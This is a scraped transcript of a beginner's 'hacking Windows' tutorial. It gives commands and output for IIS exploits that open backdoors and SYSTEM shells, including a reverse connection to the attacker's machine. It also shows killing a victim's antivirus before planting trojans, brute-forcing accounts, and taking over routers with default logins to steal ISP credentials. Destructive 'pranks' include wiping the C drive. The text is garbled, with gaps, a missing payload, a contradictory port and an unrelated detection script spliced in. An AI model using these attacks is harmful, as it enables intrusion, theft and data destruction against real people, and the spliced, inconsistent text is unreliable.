beginners guide to hacking windows


Upload: vivek-rathi

Post on 26-Nov-2015


DESCRIPTION

Provides a beginning of ethical hacking, i.e. how to hack FB account, Gmail etc.

TRANSCRIPT

Beginners guide to hacking Windows by WindowsHacker

The best way to start hacking is to teach yourself!!! All programs mentioned can be downloaded from http://www.windowshacker.kickme.to/

In this tutorial the basics of hacking and some more advanced hacking techniques will be explained. So if you're a n00b, read on! VERY IMPORTANT, GOOGLE IS YOUR BEST FRIEND WHEN YOU WANT TO LEARN HOW TO HACK!!

http://www.windowsh4cker.kickme.to

Windows Hacker Tutorial V2.4

Contents

1) FAQ - Frequently Asked Questions

2) Securing your Windows PC

3) Using a Trojan / RAT

4) Hacking a PC through NETBIOS shares

5) Hacking a PC with an exploit

6) Disconnecting someone from internet (DOS attack) - (Nuking)

7) Getting a PC name, MAC address and user name logged on

8) Understanding IP addresses

9) IIS (Web server / Web page) hacking

10) Crashing WIN95/WIN98 PC with any access to share

11) Creating undeletable directories remotely

12) Connecting to mIRC through a wingate

13) Anonymous email / Email as any address

14) Resetting and cracking Win2K or WinXP administrator password

15) Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

16) Killing programs or processes remotely

17) Getting someone's IP and doing a ping sweep

18) Pranks to pull on someone

19) Cracking a user account locally or remotely - brute force or dictionary attack - Win2K and WinXP

20) Accessing Routers

(1) FAQ - Frequently asked questions

How do I hack? - There is no easy way to learn how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you a lot.

What do I need to be able to hack? - Firstly you need to understand how your computer's operating system works, how networks and protocols work, security settings and general PC knowledge. After you understand how it works you need hacking tools which help you to hack.

What is the command prompt (cmd - the little DOS window)? - Go to START, RUN and type in: "cmd"

What can I do in cmd? - You can do various things with it, like run exploits or do a ping request.

Why do some of the hacking tools I download just close themselves when I open them? - Lots of hacking tools are DOS based and have to be run through CMD. If you double-click on the program it will open a DOS box and automatically close the box. From CMD you can navigate to the directory in which your hacking tool is stored and run it from there. Other hacking tools are GUI (graphical user interface) based and will open like a normal Windows program.

What is an IP address? - Every computer connected to the Internet or some network has an IP address. Go to START, RUN and type in "cmd", then type in "ipconfig"; it will show you your IP address or addresses. It will look something like this: 81.35.99.84. IP = internet protocol.

How do I find someone's IP address? - Look further down in this tutorial and use IPSTEALER.

What can I do with an IP? - Well, you need someone's IP before you can hack, portscan or DOS them.

What is IP ping? - It's a command you can use to check if someone's IP address is online, i.e. to check if they are connected to the Internet or a network. In the command prompt type in "ping 192.168.0.21" - this will show you something like this:

Pinging 192.168.0.21 with 32 bytes of data:

Reply from 192.168.0.21: bytes=32 time

[...]

net share c=c:

9. Exit from target.. don't forget!

C:\WINNT\system32>exit

10. Use the shared drive, run cmd:

C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C:

[...] / beavuh labs.

usage: jill-win32

An example of how to use it:

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs its IIS service on, 196.89.65.45 is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, on which TFPD32 is listening.

Here is another example:

Download IISHack and do the following:

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to [email protected]> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.

C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

For those people who do not have a clue what's going on here, go the script kiddie way and download the other GUI (graphical user interface) IIS hacking programs from my IIS page and let the program deface the web page for you. There are a few IIS tutorials in the Windows Hacker misc section.

(10) Crashing Win95/Win98 PC with any access to a share

Windows 95/98 does not react well to the /con/con command. Any Windows 95/98 PC can be crashed with this /con/con exploit, but you need access to a share on the PC; any access will work.

Create an htm file with the following code in it:

# (remove the '#' when you type it)

click me!

#The pcname is the PC name of the PC you want to crash (or its IP) and the sharename is the share you have access to. When you open the htm file and click on the link, it will crash (BSOD) the PC.

(11) Creating undeletable directories remotely

Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4. Does not work on Win2k or Win XP. Beware, don't try this on yourself!! Windows 9x and NT 4 have a flaw which allows a remote connection to create undeletable, well, practically undeletable, files and directories anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete them through DOS commands. Download NetBiosBomber, choose the target, choose which OS and you are ready to make someone's life hell. Remember, if their system is updated it will not work.

(12) Connecting to mIRC through a Wingate

A wingate is like a proxy server: anyone can connect to the server (some do have usernames and passwords) and then work through the server to connect to some other server. It will then look like you are working from that server; your identity is changed. mIRC is an internet relay chat client, a chat room client. Download mIRC now!! In mIRC there is a firewall option; this is where you specify your wingate server. Click the "use firewall" option, make sure it's set to socks 4! and put a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate lists are available from Cyberarmy, or you can use any port scanner, or you can use Proxy finder to search for socks wingates on a subnet. Scan any IP range for hosts that have port 1080 open. Wingates are great for IRC to keep you anonymous.

(13) Anonymous email / Email as any address

Download RA-Anonymous email first. Then choose who you want to send to and who you want the email to be from. For this to work you will have to find an SMTP server that accepts relaying. So in the server space put in: "smtp.mweb.co.za" - this SMTP server worked at the time I tested it.. and you are ready to send someone email from [email protected]!! :) Download OPENRELAYCHECKER from my downloads page; you can use it to search for email servers that support relaying.

Alternatively use www.Hidd3d.com to send anonymous email.

(14) Resetting and cracking Win2K or WinXP administrator password

Resetting your Win2K admin password is easy. Boot up with a Win9X boot disk or CD. Go to the Winnt\system32\config directory. There will be a file called "SAM". Delete that file and reboot the machine. Now the Administrator account password will be reset to blank (no password). Only works with FAT32 partitions.

For Windows XP you need this file, which has a few utilities you can use to reset the XP administrator password.

Then there is also a program called AdminHack, into which you load a dictionary file to crack the administrator account if you have local access to the PC.

(15) Connecting to MIRC/KAZAA/ICQ thru a firewall that has certain ports blocked with a SOCKS server

When you are behind a firewall and mIRC, Kazaa or ICQ is blocked you can use a technique called HTTP tunneling. Basically your program connects to a program running on your computer, and that program redirects the data through HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect mIRC, Kazaa, ICQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. The server address is 127.0.0.1 - your local IP - and the SOCKS port is port 1080.

(16) Killing programs or processes remotely

Let's say you try to upload a trojan to someone's machine and their anti-virus picks it up. Check if you can get an account on the machine with Administrator rights. If you have an account like that, you can use PSKILL to kill the anti-virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running Norton anti-virus the file will be something like nav32.exe. Now with pskill the command will be:

pskill \\66.33.22.11 -u administrator nav32.exe

66.33.22.11 is the IP or PC name of the victim

-u administrator is the account you have admin rights to

nav32.exe is the program file name or process you want to kill. You can even use winlogon.exe, and it will most probably give a blue screen after you kill that process.

So now you have killed the anti-virus or firewall and you are ready to upload a trojan or keylogger or anything you like...

(17) Getting someone's IP and doing a ping sweep

Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, click on Listen and send your victim the link to use. When they open that link it will show up in IPstealer.

If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IPs are online. Download Superscan and put in an IP range: Start 80.23.23.1 to Stop 80.23.23.255, and choose "ping only" under scan type. It will scan the whole IP range and show you which IPs are online.

(18) Pranks to pull on someone

Here are a few things you can do to someone to annoy the living hell out of them :)

1) Blue Screen Of Death: Create a batch file "something.bat" and edit the file so it contains the following (Win9X only):

C:\Aux\Aux or C:\Con\Con

Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the PC reboots it will throw out a BSOD every time it starts up.

2) Deleting the person's whole C drive with this command: Deltree /y c:/*.*

3) Make a screenshot of the person's desktop, put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way; just check how clever your friend really is. Or put a password on a screen saver and put the screen saver file into the startup folder. They will have to boot into safe mode to restore the screen saver.

4) A nice harmless trick: schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream.

5) Go to the Windows directory and look for a file Win.ini. Edit the file and look for a line with: shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up at all. Look for system.ini and change the same: shell="explorer.exe to shell=". Bill Gates Hates You" :)

(19) Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of an account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar <[email protected]>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account you're trying to crack

-f is the name of the wordlist you will be using

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Second program we will use is Starbrute

Starbrute can be used either to crack a user account on your own local PC or to crack a user account on a remote PC. Starbrute uses brute force to guess the password, meaning it will use the charset 1234567890abcdefghijklmnopqrstuvwxyz in random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

Starsky32 IPC bruteforce

Target IP:192.168.0.3
User Account:guest
Charset:1234567890abcdefghijklmnopqrstuvwxyz
Start lenght:3
Max lenght:4
Process priority: High

Starting... Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

192.168.0.3 is the IP of the machine you're trying to get the account password from.

guest is the account name you're trying to crack

3 is the start length of the password

4 is the maximum length of the password

high means the program will use a lot of resources - the higher, the faster it can guess the password

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

With both these programs you can specify any account on a machine - administrator, guest or whatever.

Remember you can find out what account is logged onto a machine by typing this command into CMD: nbtstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.
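The other side of the dictionary and brute-force runs shown above is that each wrong guess lands in the target's security log as a failed logon, so a burst of failures against one account from one address is the signature a defender looks for. The following Python script is an added example, not code from the tutorial or from lbrute/Starbrute; the log format and the sample lines are constructed for the example.

```python
"""
Added example: flag the failed-logon burst that a dictionary or brute-force
password-guessing run leaves behind. The input is a constructed, simplified
failed-logon log; real Windows 2000/XP logs record a failed logon as Security
event ID 529, newer Windows versions as event ID 4625.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log, one "<timestamp> FAIL user=<account> src=<ip>" per line.
# 192.168.0.3 is borrowed from the Starbrute example above; here it is used as
# the guessing host's address purely for illustration.
SAMPLE_LOG = """\
2006-03-01 10:00:01 FAIL user=guest src=192.168.0.3
2006-03-01 10:00:02 FAIL user=guest src=192.168.0.3
2006-03-01 10:00:02 FAIL user=guest src=192.168.0.3
2006-03-01 10:00:03 FAIL user=guest src=192.168.0.3
2006-03-01 10:00:04 FAIL user=guest src=192.168.0.3
2006-03-01 10:00:05 FAIL user=guest src=192.168.0.3
2006-03-01 10:30:00 FAIL user=bob src=192.168.0.7
2006-03-01 11:45:00 FAIL user=bob src=192.168.0.7
"""


def parse_line(line):
    """Turn one constructed log line into (timestamp, account, source)."""
    ts_str, rest = line[:19], line[20:]
    fields = dict(f.split("=", 1) for f in rest.split()[1:])
    return datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S"), fields["user"], fields["src"]


def detect_guessing(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return the sorted (account, source) pairs that accumulated at least
    `threshold` failed logons inside any sliding `window`: the rate a wordlist
    or charset guesser produces, while a user's occasional typo stays quiet."""
    recent = defaultdict(deque)   # (account, source) -> timestamps inside window
    flagged = set()
    for line in log_text.splitlines():
        if " FAIL " not in line:
            continue
        ts, account, src = parse_line(line)
        key = (account, src)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(key)
    return sorted(flagged)


if __name__ == "__main__":
    for account, src in detect_guessing(SAMPLE_LOG):
        print(f"possible password guessing against '{account}' from {src}")
```

On the sample log only the six-failure burst against 'guest' is reported; bob's two failures an hour apart fall outside the window.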

(20) Accessing Routers

Routers are devices which are used to route data on a network; a router decides where certain traffic should be sent. Routers act as a gateway to the Internet and are used by most people these days to access the Internet instead of modems. A client PC can be connected to the router either through a LAN cable or with a wireless card. Routers are mostly configured through a web-based system or with a command prompt window (cmd).

Most home users with ADSL use routers as their gateway to the Internet.

Some routers are configured so that they can only be administered through the web-based system when you are connected to the router's local network - the internal LAN. To connect to the router you will use your web browser. A typical router IP address would be 192.168.0.1, so this would be the address to use to connect to the router through a browser: http://192.168.0.1/

If you are using a router as your Internet gateway, try connecting to it. Remember the router's IP address could differ from the example above. If you don't know your router's IP address, go to the command prompt and type in: ipconfig

Your local area connection gateway address will be your router's IP address. Remember, the router is your gateway to the Internet.

When you are connected to your router through the web-based system it will ask you for a username and password. If you know the login details, use them to log into the router. If you do not know the login details you can try the default login details as set by the router manufacturer. Have a look at this list of default login details.

In your router's configuration you can set the settings which the router uses to connect to the Internet, security settings, local LAN configuration, DHCP settings, port forwarding, statistics and information about the router status, and many more.

Accessing a router through a command prompt window can be achieved by going to the command prompt (cmd) and typing in:

telnet 192.168.0.1 23

23 is the port through which the router will be accessed.

You can access someone else's router over the Internet, log in and change settings, forward ports, reset the router or even steal their ISP (internet service provider) details. When you telnet to a router and it brings up the login screen it will sometimes show you what make and model the router is. Then check the default password list and see if you can log in with those default login details and obtain access to the router. If the person whose router it is has not changed the router's default login details you should be able to access the router easily. Most home users do not change the default passwords.

Now if you are able to get into a router, an ADSL router in this case, you will be able to get the host's ADSL username and password. The password would be masked and hidden behind ****'s, but if you right-click on the page and look at the source, the password is most of the time displayed in clear text. Otherwise use a program like RevelationV2 to unmask the password.

Telnetting to a Marconi ADSL router with the CX82310 chip from Conexant on port 23 will give the following output:

01/01/99 CONEXANT SYSTEMS, INC. 00:04:10
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21

LOGIN PASSWORD>

And logging into the router will bring up the main menu:

01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29

MAIN MENU

1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU

4. REMOTE LOGON

Q. LOGOUT

ENTER CHOICE-->

This specific Marconi router has a vulnerability: if you telnet to the router on port 254 (as shown above) and the enter key is pressed (blank login password), you will gain access to the router. In this menu you will be able to remotely reset it to factory settings, allowing a permanent denial of service attack until it is reconfigured manually.

Another vulnerability of this Marconi router is that when you connect to the router with the web-based GUI (graphical user interface) you will be able to see the ISP password when viewing the webpage source. http://192.168.10.200/Bconfig /System.sht